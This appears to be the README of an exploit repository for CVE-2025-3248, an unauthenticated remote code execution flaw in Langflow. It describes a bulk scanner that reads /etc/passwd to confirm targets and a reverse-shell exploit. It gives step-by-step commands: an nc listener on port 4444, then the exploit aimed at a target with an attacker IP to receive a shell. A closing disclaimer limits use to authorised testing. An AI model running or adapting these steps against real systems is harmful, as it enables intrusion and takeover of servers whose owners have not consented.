## https://sploitus.com/exploit?id=7BFED669-FAC0-5596-915A-7E14C6C03D6C
# CVE-2025-3248: Langflow Unauthenticated Remote Code Execution (RCE)
This repository contains two Python scripts:
- `LangflowCheck.py`: A scanner that checks for Langflow AI instances vulnerable to CVE-2025-3248.
- `exploit.py`: A working reverse shell exploit for vulnerable Langflow targets.
## Summary
**CVE-2025-3248** is a critical vulnerability in Langflow AI that allows **unauthenticated attackers** to execute arbitrary Python code remotely via a crafted payload to `/api/v1/validate/code`.
---
## Files
### `LangflowCheck.py`
- Checks if a target is vulnerable by attempting to execute a harmless payload that reads `/etc/passwd`.
- Can scan a single target or a list of URLs.
- Supports outputting vulnerable targets to a file.
### `exploit.py`
- Sends a reverse shell payload to the vulnerable endpoint.
- Requires attacker IP (`lhost`) and listener port (`lport`).
- Logs activity to `exploit.log`.
- Supports listener check before sending payload.
---
## Usage
### 1. Install Requirements
```bash
pip install -r requirements.txt
```
### 2. Run Vulnerability Scanner
Single URL
```bash
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
````
Multiple Targets
```bash
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
```
### 3. Exploit a Target
First, start a listener
```bash
sudo nc -nvlp 4444
```
Then, run the exploit:
```bash
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
```
You should receive a shell if the target is vulnerable.
## โ ๏ธ Disclaimer
This exploit is for educational and authorized security testing only. Do not use against systems you do not own or have explicit permission to test.